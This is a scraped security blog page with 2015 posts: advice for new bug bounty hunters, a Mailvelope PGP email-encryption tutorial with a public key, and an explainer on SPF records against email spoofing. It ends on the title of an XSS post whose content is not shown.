Bug Bounty Reports

Clickjacking Test Page

Clickjacking Test Page

Test a page for clickjacking/framing vulnerability Enter the URL to frame: Test it! …

03 Aug 2015

Getting Started in Bug bounties

<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
Bug bounties, also known as responsible disclosure programmes, are setup
 by companies to encourage security researchers to report vulnerabilities discovered 
on their sites.<br />
Some companies offer rewards, 
swag, hall-of-fame in their website.<br />
If you’re web 
application security geek then this is the place to show your skills and also can earn some money.<br />
<br />
You should follow some guidelines to be a successful bug hunter<br />
<ul style="text-align: left;">
<li>Owasp Top Ten list. </li>
<li>Book - Web Application Hackers Handbook.</li>
<li>Blogs - Follow other security researcher blogs to learn from their findings, <a href="http://www.breaksec.com/?page_id=6002">Nir Goldshlager</a>, <a href="http://olivierbeg.nl/">Oliver Beg</a>, <a href="https://fin1te.net/" target="_blank">Jack, </a><a href="http://homakov.blogspot.co.uk/">Egor Homakov, </a><a href="https://nealpoole.com/blog/">Neal Poole</a></li>
<li>Tools - Burp proxy to intercept the traffic</li>
<li>Firefox plugins-Tamper Data, Live HttpHeaders, Firebug, Wappalyzer</li>
<li>VulnerableWebApps - For practicing - Webgoat, DVWA</li>
<li>Bugbounty platforms - <a href="http://hackerone.com/" target="_blank">Hackerone</a>, <a href="http://bugcrowd.com/" target="_blank">Bugcrowd</a>, <a href="http://cobalt.io/" target="_blank">Cobalt </a>- signup for these sites to submit reports to various sites</li>
<li>Reports - Submit reports to the sites with good proof of concept, impact of vulnerability and remediation.<br /> </li>
</ul>
</div>
</div>

Getting Started in Bug bounties

Bug bounties, also known as responsible disclosure programmes, are setup by companies to encourage security researchers to report vulnerabilities discovered on their sites. Some companies offer rew…

27 Jul 2015

PGP Email Encryption Using Mailvelope

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><a class="ext-link" href="http://www.mailvelope.com/" target="_blank" title="">Mailvelope</a>
 is a free browser extension for Google Chrome and Mozilla Firefox that 
introduces OpenPGP encryption to webmail services that you may be using.
 The extension supports for Gmail, Yahoo! Mail, Outlook and 
GMX by default, and options to integrate other web-based email providers
 as well. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFYkpCjpg32q2TAxG3z_9ikyHlAr-yOanl2nEcS3hswxsHleSDsPkeDkT72_e-bTqTTcFGsDrq1UnxIXsee4gr_seiHoiMipQsKR8UjcNJUBT5hI5JIxS5FmSuKYcy93tIG7H3phtq-MSB/s1600/mailvelope_WP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFYkpCjpg32q2TAxG3z_9ikyHlAr-yOanl2nEcS3hswxsHleSDsPkeDkT72_e-bTqTTcFGsDrq1UnxIXsee4gr_seiHoiMipQsKR8UjcNJUBT5hI5JIxS5FmSuKYcy93tIG7H3phtq-MSB/s1600/mailvelope_WP.png" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><b>How to use Mailvelope</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;">First, you'll install the plugin for <a class="" href="https://chrome.google.com/webstore/detail/mailvelope/kajibbejlbohfaggdiogboambcijhkke?hl=en">Chrome</a>, or the Add-on for <a class="" href="https://github.com/toberndo/mailvelope/releases">Firefox</a>.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhDMR382sn0_Kh1y_Fy4i7ohyFUrnaVGx1L63vETH_l3GQnRUk3ybsRVacMgw0eYAOGgAnnz4IzMklpgCNu79doPwP29xIoSLlQ4yjwMbMg7JPqiC3goHs40yH3ThUQxwL8bB3KDrGVwNA/s1600/Screen+Shot+2015-06-21+at+10.23.43+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="324" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhDMR382sn0_Kh1y_Fy4i7ohyFUrnaVGx1L63vETH_l3GQnRUk3ybsRVacMgw0eYAOGgAnnz4IzMklpgCNu79doPwP29xIoSLlQ4yjwMbMg7JPqiC3goHs40yH3ThUQxwL8bB3KDrGVwNA/s640/Screen+Shot+2015-06-21+at+10.23.43+am.png" width="640" /></a></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">After you install it, you need to generate a key-pair for Mailvelope 
to use with your desired email. It will generate a public and private 
key. <b><i>DO NOT EVER SHARE YOUR PRIVATE KEY.</i></b></span><br />
<br />
<span style="font-family: inherit;">This demonstration will be using the Firefox Extension and Gmail, although 
Mailvelope is designed to work with all major webmail providers. It is 
currently in Beta and they are adding support for more webmail services.</span><br />
<span style="font-family: inherit;">To generate a key, open the Mailvelope extension and go to the "Generate Key" tab as shown below.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjioPRzF6e_3hCdEvvstNtBdjY7N0NAJs2xg0t0vc1ovHbop5WG_yjnL4ypq7-g_KDdVuC5xa9-5PBh9GGuWg7H-WQOBE8rZt__w7JRLaSaDCmDokrNODkgx6lYRmMXZ4LpFcl5de8nQIr7/s1600/Screen+Shot+2015-06-21+at+10.30.31+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjioPRzF6e_3hCdEvvstNtBdjY7N0NAJs2xg0t0vc1ovHbop5WG_yjnL4ypq7-g_KDdVuC5xa9-5PBh9GGuWg7H-WQOBE8rZt__w7JRLaSaDCmDokrNODkgx6lYRmMXZ4LpFcl5de8nQIr7/s640/Screen+Shot+2015-06-21+at+10.30.31+am.png" width="640" /></a></div>
<br />
<span style="font-family: inherit;">Fill out the appropriate information, and hit "submit". If you want 
maximum privacy, it is a good idea to click on the advanced button and 
enable 4096-bit key lengths instead of 1024 or 2048. Make sure that you 
assign a very strong password to your keys, they are your final line of 
defense if your PC is ever compromised by an attacker. After you hit 
submit, it will take some time to generate the keys. If you get a "this 
page isn't responding" message, just continue to wait, it will finish 
building your keys and give you a success message when it finishes. </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEfwLB8MoVj6TZ5-ATjHyxW_adjBnXBbJV_-tNl_We_QgJBGYSnMnYB1pugIdYe96isyfoG1J5jQHpzbMms3cr-9kp9aB8nfeo3JPZziSVYPV0CtKLubqmf7nA1QznjFjq6UKJpLsKqUlK/s1600/Screen+Shot+2015-06-21+at+10.40.50+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEfwLB8MoVj6TZ5-ATjHyxW_adjBnXBbJV_-tNl_We_QgJBGYSnMnYB1pugIdYe96isyfoG1J5jQHpzbMms3cr-9kp9aB8nfeo3JPZziSVYPV0CtKLubqmf7nA1QznjFjq6UKJpLsKqUlK/s640/Screen+Shot+2015-06-21+at+10.40.50+am.png" width="640" /></a></div>
<br />
<span style="font-family: inherit;">Now that you have generated a key pair, you have a public key and a 
private key in your keyring. You can see your keypair in the "Display 
Keys" tab as shown below.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiisQk1ho2iZdshBntB1eZ5YNdi5lVlr5uysZBejQO3c0b0fIc08Odu6uFgsiwDFQd4riP0K2CIhnO2Dv1wJrGpyZ5TQImoxZH1NPtVS5U8wdOS4c5P8bYSzsTET1Zas_oLZ80yd6dCGfc2/s1600/Screen+Shot+2015-06-21+at+10.57.03+am.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiisQk1ho2iZdshBntB1eZ5YNdi5lVlr5uysZBejQO3c0b0fIc08Odu6uFgsiwDFQd4riP0K2CIhnO2Dv1wJrGpyZ5TQImoxZH1NPtVS5U8wdOS4c5P8bYSzsTET1Zas_oLZ80yd6dCGfc2/s640/Screen+Shot+2015-06-21+at+10.57.03+am.png" width="640" /></a></div>
<br />
<span style="font-family: inherit;">The important thing about PGP encryption is that there is a public 
key, and a private key. In order for someone to be able to send you 
secure messages, they have to have your public key. </span><br />
<span style="font-family: inherit;">In order for you to 
send them secure messages, you have to have to have their public key. To
 find out what your public key is, you can use the "export"
menu in the "display keys" tab. You will have to enter your password to 
get to your keys.</span><br />
<span style="font-family: inherit;">So in this example, I want to send a message to the bugbountyreports@gmail.com. To do this, i need to have the public key.</span><br />
<span style="font-family: inherit;">The public key for bugbountyreports@gmail.com is below:</span><br />
<br />
<span style="font-family: inherit;">-----BEGIN PGP PUBLIC KEY BLOCK-----<br />Version: Mailvelope v0.13.1<br />Comment: https://www.mailvelope.com<br /><br />xsFNBFWGR2IBEACUOeqsoi2quNb7KmeHwrp7vDsYMjazH+lQ2If1tj7Q3wxz<br />ZStr928MIkjfp++emrUTgTZCkKq0w/+lclLOWBrcU8tkToXiBeFmY3qQ21+L<br />ATj097bu+Si0xw0ZTDSXgIbfJZUj+TbZ2+5iYgR/332t9dHBohkadXik5mWM<br />u3NMB0kzANLYgqmjmiHGKJvtIhYh4LFE4DPAGDJqRUBJhCckii8WLszCnMym<br />gbRzP80kBuSatu5ZMEDur6EqpVR/D5H35Xa66JEt+zSFX4FZrwS/8k6wkH1p<br />h1a7qTi47KICJjemVStl05cC+p3ZNz0n7cuEg86Zc++plsCmPCMoUUA4/Lc1<br />1GTeR6TFrFEjHkkfycGLq5+8zJNzCPbIAMtqJb8yksEBGRk2ZeX80q/atjHg<br />WUEJMewlvIwtvOdpIMa5pkMAMc5CozsxfsBo3QYmaO8jPYC/JhFsJKx6f+fo<br />j7dK9mPKYxqLNCl2WwlgCsjKPwJ4Hc6t/gbi8Qkh7cDrO9yXtS6iZ+ykqHLB<br />7L7zAL7dj88ZsvsMuiBDzjKk8cs2oBbggj2bgp5VwnGCFfGwMa2Ln10Gzn1B<br />ZqeKkchkrWIlsMI1F/slHLZc9Nlr1wq1TrT7njkmRorr3sIfAQJMpW/iZLu4<br />BRqKJt4/jzy/HOek7y6LousVhlSC/2MHQeRfZQARAQABzS1idWdib3VudHly<br />ZXBvcnRzIDxidWdib3VudHlyZXBvcnRzQGdtYWlsLmNvbT7CwXIEEAEIACYF<br />AlWGR6UGCwkIBwMCCRD8eTin8HRxSgQVCAIKAxYCAQIbAwIeAQAABBwQAIhr<br />/icQq3bZ+uzchtUuaep+T2q9Y8fIi2ZjFlUOmnwnqwsy85lkrqrKwBL5MS/H<br />jbxqsTiJWGoORamBtQthj7spg4CRgK9ixcddFui51nUmof38gjMZhIF5Jwp5<br />DC+ZU6SyxSowopSHYmO7uRmgtHfnfg35gFszbuusRlT2DQCRroJZirLnMPLx<br />keFTM3Waxv5dzToF+oGYSU28lV1f/XN6xgE7H61E3FH+gi7Eok1pF6BOv01O<br />C0W+yS6VHgody6N9KI9/yqmaUl1tDlOxt9GmDO1yI/4l8BP3MFI87Vyb/ggE<br />RtcHVnep+nqZZZZ68wx8auxWoAMmeK5FGnKAKI1Xdj4lSLxEiEBYOqFM1YJd<br />mGBlaBaRFwfRKxyCV+c5bMkT2QPaImbdzTOwWw/RkVzfOI/xQ2g5lh9VdrOy<br />4XMe0TynnIUyjoVOXe1/f3gelRaObNuNlRA80gv9DlxzksYhnEbMbza/iO3e<br />UaGAIUcVUyqANXLz/f1/FDvFzvIhBNAbFPt9Z7GzE+S7XmCz8n1j5odeVsEu<br />gdw3YRHEsivy4MJTKrewEbRMXqxk2Y/tSGdsaCSuKNEuquZx7ff6TdCa/Roc<br />TtdvjRjb9HeUPcVO+szFLSPPN5sSi1LhZn35GHjd8vUQyIWJA+XvRJWnY8vH<br />6kR/fi5mAnAm/OHXE9mazsFNBFWGR4sBEACzfxdy2fhNNjruiuAA50yUZqrU<br />8Padgw0d1uuIbWDrN94bvza0mHgYeEB5i6FIDOnen/rFXLzhsK8lvjJjx/GW<br />vc9heleozC/7z9vn7N5ctwrBwK+NuvrFq2Zi6SLymhLYMFk8wqsBOYFdMlST<br />Y9uOV97SkltidAdjnEtZCEfu68JVNq+tPcRZ5CBOqaXXZodaqW64Kth6rHL3<br />vquak4Mz0zouacaOdRDhYfKkibMCcHZG2AkO08l2PmZFEB1DaG9TxKUr9WAc<br />sTrXBOunQ/skXN16a+PHrNyIEMlj7GRr11z3f7BksO2unuTC9IKUm+fnHHi7<br />CwZwdThODtvXLzmLjIpWcA2AbvItLWtVFhbl+k26Gs4Egoo/l80wnVUrIF98<br />jAvBD4Qwvkv2m9F0OHEgjdMbHlh6GZOWtD/hltldJq+pNl6Ke14X9190NSUr<br />xFVcLslEnDdDX7j1fYLqV56Ffa3Avk3U7Be1p0Qnj58kESYsBm+cDMqcFPaQ<br />DgVljbLd/lrWcXPUjuNwfdqHKSSTvgVC/x9DhW7i9iknlo3PPorUFNFi7jLb<br />k+mw4lsvMUhXSqzmoz0oCEgQhfdu7lhRXDRMUtY/UXEti2oH0EuL05WVIXAz<br />DXMbRrRfmRmHuggKZ84R8lN1fH0udrB5ClLm7BGlB6Z9KCyiLJXjeKbFvwAR<br />AQABwsFfBBgBCAATBQJVhkenCRD8eTin8HRxSgIbDAAA9QEP/jXUtlFsbURV<br />uZpRK/0qkpi19IMhOBmMnb/+CGTFSkAq4byzFPhRv9V6GNOLKHJURwBMmPtt<br />4Ru7c3tsCbnHW1jTZyibiLFtz+kwRzVscpLkMXc1iKGhpogjeoKPtDeKqbSZ<br />ud4poVaDYZTN8Xw9m2ikYgNwQpkv/u0HY0vu583J7sYFpZ3ZGLOc1CRl/m98<br />UPpRz0Ab31LOg2eE3nAkChSsc8xBXIo9jOUeduhEiYB/jggh9egB8e+Lf1O1<br />AYr1N4tTTOS4ryXrVc3nX1RTihtmnjPLVe7CDVp+FkKw0vGyUDAidXEfW0gs<br />yybn1IcHUfYx+omVKPJ37vw6Q9a1wvQwraV4n+WDO/ng/AXP+b6SGa/y/ph2<br />p/qapvOWkVwRJXMdhA7m7/460JlajjLGDwl8UsZY43hP9sVvHzAWxUoLKQAg<br />REDYvLtb0FUNgJ8vp/Enn3fNGfJfpJcu3SJNNFysLqLAHXTQWBvNs4nzGBXr<br />25DXmjwVYC+PzGy57UIjqgDzXYEDoPAp1L/QV0arc2NTuwmIFUI0fXXzDoL5<br />zn5JNE3E5jjVph3tqRxTt+LuBze6t9fcrEleyVy5FTxZf0SFWL+IWKrZzwd3<br />RdGQL7Et/CVri5735mGBXtPZPu40/MGZ1gIFvW05cu5DBEFBeYqiE0NgPkZp<br />w0qxivRnoR/1<br />=GwaC<br />-----END PGP PUBLIC KEY BLOCK-----</span><br />
<span style="font-family: inherit;"><br /></span>
<br /><span style="font-family: inherit;">So what you want to do is <b><i>import</i></b> this public key into 
mailvelope, so it knows which public key to use when you are emailing bugbountyreports@gmail.com. Below, I have pasted the bugbountyreports@gmail.com public key into the 
field in the import tab.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6w66CiA1Vc9MA5l3WYVVllU4MoxnIk0-ik8vlX0sivW2lAQSm_4PKILThOMXooRny_ErG-Q28K9oJB8BBvjVeq_XuzmfQQHsnvmyhc_OrlYxNwa3R6uY10jeRauDIvbKSdf2-HFXVPRvo/s1600/Screen+Shot+2015-06-22+at+1.09.29+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6w66CiA1Vc9MA5l3WYVVllU4MoxnIk0-ik8vlX0sivW2lAQSm_4PKILThOMXooRny_ErG-Q28K9oJB8BBvjVeq_XuzmfQQHsnvmyhc_OrlYxNwa3R6uY10jeRauDIvbKSdf2-HFXVPRvo/s320/Screen+Shot+2015-06-22+at+1.09.29+pm.png" width="320" /></a></div>
<br />
<br />
<br />
So, once you have completed this process, you are ready to 
send secure emails to one another with no worry of eavesdropping. Even 
when (not if) an agency drags up your email, they are unable to decipher
 the messages without having one of the private keys.<br />
So let's send a PGP-encrypted email to bugbountyreports@gmail.com.<br />
Below,
 you can see bit about how Mailvelope works in practice. When you begin 
to compose a new message in Gmail you will see the small overlayed 
button that looks like a pencil and notepad. You click that button to 
start writing a secure message offline. You then write your message in 
the window that pops up.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ6DntYmw7EI4pkU7S6xabJZL9EdtKDx1PT6Sghv-2l-NZ5OUEKtrna_T4eyOMEwI5olQ3NLoCa8BHQNkIPo5_d5XFZH8S_UEj_eBPosvP6HC4n7IWIqcK8hIa1CxVmvy2OvuO5zNjhXM4/s1600/Screen+Shot+2015-06-22+at+1.16.40+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ6DntYmw7EI4pkU7S6xabJZL9EdtKDx1PT6Sghv-2l-NZ5OUEKtrna_T4eyOMEwI5olQ3NLoCa8BHQNkIPo5_d5XFZH8S_UEj_eBPosvP6HC4n7IWIqcK8hIa1CxVmvy2OvuO5zNjhXM4/s640/Screen+Shot+2015-06-22+at+1.16.40+pm.png" width="640" /></a></div>
Once you have finished writing your message, click Encrypt button in the message window. This pulls up a menu so you can 
manage who you are encrypting the message for, as shown below. You can 
see that I have added BugBountyReports as my target recipient. Mailvelope is
 robust enough to support sending out the same message to multiple users
 at once, using all of the relevant public keys you have imported.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9JBw2v0UpAd-p955r0eYezdy0ewb_6Hi6-cK8Pp2tCuKEOSawlC6vLxSqbICjnuP3Z_-yKWn14xgSiOri0i2PHEaQ2DhuUzwTK_W52bnVAzMnLfreUuKn6upWFlTZSEVD2uTGHB6OUZlA/s1600/Screen+Shot+2015-06-22+at+1.15.40+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="270" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9JBw2v0UpAd-p955r0eYezdy0ewb_6Hi6-cK8Pp2tCuKEOSawlC6vLxSqbICjnuP3Z_-yKWn14xgSiOri0i2PHEaQ2DhuUzwTK_W52bnVAzMnLfreUuKn6upWFlTZSEVD2uTGHB6OUZlA/s640/Screen+Shot+2015-06-22+at+1.15.40+pm.png" width="640" /></a></div>
<br />
Once you are finished setting up the recipients, you click the 
"transfer" button in the message window. This encrypts your email 
message with the appropriate keys. You'll see the PGP encrypted message 
in the Gmail window, ready to be sent, like you can see below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTiVw4LA5TgzEgYQH0hNWvRL97pRuod7WBny_SjHtt85bQeW-daU5znPXno6XGBSE_zD6MDc59YZHmom5QAyqSmzUe3JC1t8Prs6j6wgNObTkmdcTTignqJEAjBucLh3snDWz2NUn3Hg5/s1600/Screen+Shot+2015-06-22+at+1.30.29+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSTiVw4LA5TgzEgYQH0hNWvRL97pRuod7WBny_SjHtt85bQeW-daU5znPXno6XGBSE_zD6MDc59YZHmom5QAyqSmzUe3JC1t8Prs6j6wgNObTkmdcTTignqJEAjBucLh3snDWz2NUn3Hg5/s640/Screen+Shot+2015-06-22+at+1.30.29+pm.png" width="640" /></a></div>
<br />
The message is now unreadable by all parties, except for 
those with access to the appropriate private keys. The private keys are 
never transmitted in this process, and they are securely stored locally 
by the Mailvelope plugin.<br />
It does take a couple of tries 
to learn the process, but this is far far simpler than older methods of 
using PGP. Once you are used to the process, you can encrypt an email in
 5 clicks, taking less than a few seconds of extra work.<br />
<br />
<h2>
Decrypting and reading PGP email with Mailvelope</h2>
So now you 
know how to securely compose a message to send out. You also need to 
know how to receive messages with Mailvelope. Fortunately they have made
 this pretty easy, as it used to be very tedious to manage PGP 
decryption in the past.<br />
When you receive an email that is PGP 
encrypted in your webmail service of choice, Mailvelope should detect it
 as a PGP encrypted message automatically. Mailvelope then allows you 
decrypt the message using your keys. You'll see the Mailvelope overlay 
window pop up automatically with the "secure mail" icon as you see 
below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhouA33g9ucwszgZEuq07QRah78Fsj_o0jg_TAAlAt3AVZFnaVK86n4Ty8HtBPixSSc-KcjqD44pf9l1XSBoaEFq0NmMFjUHnwgDX0IvV7UM1-fD-EF0Q7gPv6mhEGPAN6mxR3XHDVVHI7e/s1600/Screen+Shot+2015-06-22+at+1.41.06+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhouA33g9ucwszgZEuq07QRah78Fsj_o0jg_TAAlAt3AVZFnaVK86n4Ty8HtBPixSSc-KcjqD44pf9l1XSBoaEFq0NmMFjUHnwgDX0IvV7UM1-fD-EF0Q7gPv6mhEGPAN6mxR3XHDVVHI7e/s640/Screen+Shot+2015-06-22+at+1.41.06+pm.png" width="640" /></a></div>
If you wish to read your PGP encrypted message, you have to click on 
icon and fill out the information shown below. Mailvelope will prompt 
you for your password because it does not have access to your PGP keys 
without password authorization.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTNtBs0yXXsou0wl7lHWqQnbYtoGl2N6bs-3GVRVQ5sKrFFKD67GDaFgYPqIvPqVsY-qvZwNebchQlWNqSPL1DQc2ki-nvMar3ZYLm35NOAxw0BN0A6wJ-Fc_ddtEJ0wfncUe1ynrAO0d8/s1600/Screen+Shot+2015-06-22+at+1.41.29+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTNtBs0yXXsou0wl7lHWqQnbYtoGl2N6bs-3GVRVQ5sKrFFKD67GDaFgYPqIvPqVsY-qvZwNebchQlWNqSPL1DQc2ki-nvMar3ZYLm35NOAxw0BN0A6wJ-Fc_ddtEJ0wfncUe1ynrAO0d8/s640/Screen+Shot+2015-06-22+at+1.41.29+pm.png" width="640" /></a></div>
<br />
After you decrypt your message it will be perfectly readable, as shown below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTxyktEudsNmpwRrH-RYIvc7hdFZEa43Sg9JMaGzjzNs5llosZjF-j5_JF6n2DFWZwjzUWSZ7xPH8LUNs1AnTruQ6fGrLADLQZ356uegJ2vmkVM8XOBmtTTV8hjonCNAt1ALCKlX1SSNG/s1600/Screen+Shot+2015-06-22+at+1.42.10+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTxyktEudsNmpwRrH-RYIvc7hdFZEa43Sg9JMaGzjzNs5llosZjF-j5_JF6n2DFWZwjzUWSZ7xPH8LUNs1AnTruQ6fGrLADLQZ356uegJ2vmkVM8XOBmtTTV8hjonCNAt1ALCKlX1SSNG/s640/Screen+Shot+2015-06-22+at+1.42.10+pm.png" width="640" /></a></div>
<br />
 It is important to know that Mailvelope is decrypting your 
messages locally. This means that your decrypted messages are never 
exposed to the webmail service. If you click the small "x" in the upper 
right corner of the overlay window when you are finished reading your 
message, you can see the original, fully encrypted email as you can see 
below.<br />
<br /><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyUgsmRGfV3Qbg-7s7u288y1oyfymCtBajXsIMjml2R3kDgAAsdLhRRw6sUE9oHEDJ7aSDGQuaE1rSX5nTe2RjsnFJaGJq0wQEAi3r3SNA1w07vdLFmpWvQc7AVSJLpE4NilnP94mLlGQz/s1600/Screen+Shot+2015-06-22+at+1.48.14+pm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyUgsmRGfV3Qbg-7s7u288y1oyfymCtBajXsIMjml2R3kDgAAsdLhRRw6sUE9oHEDJ7aSDGQuaE1rSX5nTe2RjsnFJaGJq0wQEAi3r3SNA1w07vdLFmpWvQc7AVSJLpE4NilnP94mLlGQz/s640/Screen+Shot+2015-06-22+at+1.48.14+pm.png" width="640" /></a></div>
So there you have it. Very high security email via a relatively easy to 
use graphical user interface. After using Mailvelope a few times I have 
gotten used to the process and can encrypt and decrypt messages in a few
 seconds.</div>

PGP Email Encryption Using Mailvelope

Mailvelope is a free browser extension for Google Chrome and Mozilla Firefox that introduces OpenPGP encryption to webmail services that you may be using. The extension supports for Gmail, Yahoo! …

22 Jun 2015

Lack of SPF leads to Email Spoofing

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ7bbkgnnJdox9HZRrVqmmn-6mO6Z0FSI_TMfYokDoCljiQJEwsAdJNy3Hhfp-5OQEHcjctWQUA5FdNU4JV_D2Ce3-KhBmOf2E7EoxmoThWrEdbuJOJ0vBVn4r3IEO9G5z-SVA87WuID5v/s1600/spf2+copy.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQ7bbkgnnJdox9HZRrVqmmn-6mO6Z0FSI_TMfYokDoCljiQJEwsAdJNy3Hhfp-5OQEHcjctWQUA5FdNU4JV_D2Ce3-KhBmOf2E7EoxmoThWrEdbuJOJ0vBVn4r3IEO9G5z-SVA87WuID5v/s1600/spf2+copy.jpg" /></a></div>
The threat from malicious email represents one of</div>
<div>
the greatest risks to IT security. The Messaging Anti-Abuse Working Group (MAAWG)</div>
<div>
identifies 85% of incoming mail as abusive or malicious.  One of the best</div>
<div>
practices to reduce this risk is the Sender Policy Framework (SPF), an email</div>
<div>
validation tool to prevent the sending and receiving of forged email messages.</div>
<div>
When properly configured, SPF reduces both the likelihood of any domain name</div>
<div>
being fraudulently used to send malicious emails and the likelihood that</div>
<div>
organizations will receive such messages.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<b>How the Sender Policy Framework Works</b></div>
<div>
<br /></div>
<div>
When an organization generates an SPF record in the Domain Name System (DNS)</div>
<div>
it is identifying which hosts are permitted to send email from their domain.</div>
<div>
This record allows message recipients to query and determine whether the</div>
<div>
sending server is authorized to send from a domain. This diagram shows how SPF</div>
<div>
is verified by the recipient’s mail system.</div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdiudUazj_MmKl0xVcjvg1i7bWe8EJHkQLLwIHU-8Qr-NA3ib46HiwAmx4IS-ZuqT2XG5KR-SL3hnPvS_c_Dbb28YrbeMY5mvqmYHajl1IQ7f0F9atJlCWfAXG6M4qM1BPpY2v5j5hRufj/s1600/spf.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdiudUazj_MmKl0xVcjvg1i7bWe8EJHkQLLwIHU-8Qr-NA3ib46HiwAmx4IS-ZuqT2XG5KR-SL3hnPvS_c_Dbb28YrbeMY5mvqmYHajl1IQ7f0F9atJlCWfAXG6M4qM1BPpY2v5j5hRufj/s1600/spf.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
<b>Testing for SPF records</b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The following</div>
<div class="separator" style="clear: both;">
open-source tools exist to verify the SPF record for your organization:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
SPF</div>
<div class="separator" style="clear: both;">
<a href="http://www.kitterman.com/spf/validate.html" target="_blank">Record Testing Tool</a></div>
<div class="separator" style="clear: both;">
<a href="http://mxtoolbox.com/spf.aspx" target="_blank">MX ToolBox SPF Lookup</a></div>
<div class="separator" style="clear: both;">
<br /></div>
</div>

Lack of SPF leads to Email Spoofing

The threat from malicious email represents one of the greatest risks to IT security. The Messaging Anti-Abuse Working Group (MAAWG) identifies 85% of incoming mail as abusive or malicious. One of th…

09 Jun 2015

XSS in Referrer Header

<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
